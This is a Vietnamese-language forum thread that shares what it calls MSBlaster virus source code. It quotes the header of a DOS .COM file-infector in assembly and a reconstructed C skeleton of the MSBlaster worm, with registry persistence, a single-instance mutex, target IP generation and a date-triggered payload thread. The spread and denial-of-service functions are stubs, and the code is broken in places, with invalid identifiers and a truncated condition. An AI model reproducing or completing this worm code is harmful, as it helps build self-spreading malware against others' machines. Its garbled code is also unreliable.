Virus MSBlaster Source Code
Cái nì là Assemble mừ làm sao save dưới dạng .vbs được you . excluding COMMAND.COM
Không biết phải không ta
Quote:
Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files. If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found. (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; ---------------------------------------------------------------------------
Muốn thì lấy cái nì nè
Quote:
/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left blank. This function listens on ports 69 and 135 for incoming connections. It then tries to spread itself. It might have spread faster had it done a progressive network scan.*/void spreadworm(){}/* Deliberately left blank. Was designed to do a DoS attack on windowsupdate.com. The MS Windows Update system is flawed in this respect, there should be mirror update sites maintained around the world rather than the current cluster of servers in one location with one IP address. The worm might have been better off attacking windowsupdate.microsoft.com or microsoft.com for real entertainment value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in; DWORD temp_ip_buf; hostent _hostent; char local_ip_address[0x200], month[3], day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD ThreadId; bool status; /* Registry Key manipulation. We create the key if it doesn't exist, otherwise it is opened. Then we give the value "msblast.exe" to the key "windows auto update". Windows Auto Update is now set to run on boot up, which will run MSBlast.exe. */ RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, 0, 0, 0xf003f, 0, & hKey, 0); RegSetValueExA(hKey, "windows auto update", 0, 1, "msblast.exe", 0x32); RegCloseKey(hKey); /* Check to see if an instance of MSBlast.exe is already running, if there is one running then this instance exits. */ CreateMutexA(0, 1, "BILLY"); if (GetLastError() == 0xb7) ExitProcess(0); if ((WSAStartup(0x202, & WSAData) != 0) || (WSAStartup(0x101, & WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0)) return -1; /* We need to know where MSBlast.exe is located so that we can redistribute it. */ GetModuleFileNameA(0, &Filename, 0x104); /* Idle Event. We wait for a connection to the internet to be established before we can proceed. */ while (InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20); /* Generate Random IP Address */ i_ip_D = 0; srand(GetTickCount()); randomip_A = rand() % 0xFE; randomip_A++; randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if (gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent = gethostbyname(& local_ip_address); if (_hostent != 0) { if (_hostent.hlength != 0) { memcpy( &in, &_hostent.hlength, 4); sprintf(&local_ip_address, "%s", inet_ntoa(in.S_un)); temp_ip_buf = strtok(&local_ip_address, "."); /* Split ip address into A.B.C.(D). */ i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_B = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C > 0x14) { srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses. */ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } } srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand % 0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B = rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date. */ GetDateFormatA(0x409, 0, 0, &"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload. Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month) >
) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm. */ while (1) spreadworm(); /* Sense of Humour. The remainder of the code will never get executed. */ WSACleanup(); return 0;}
mã nguồn của Virus MSBlaster đoá
tnfsmith(VNISS)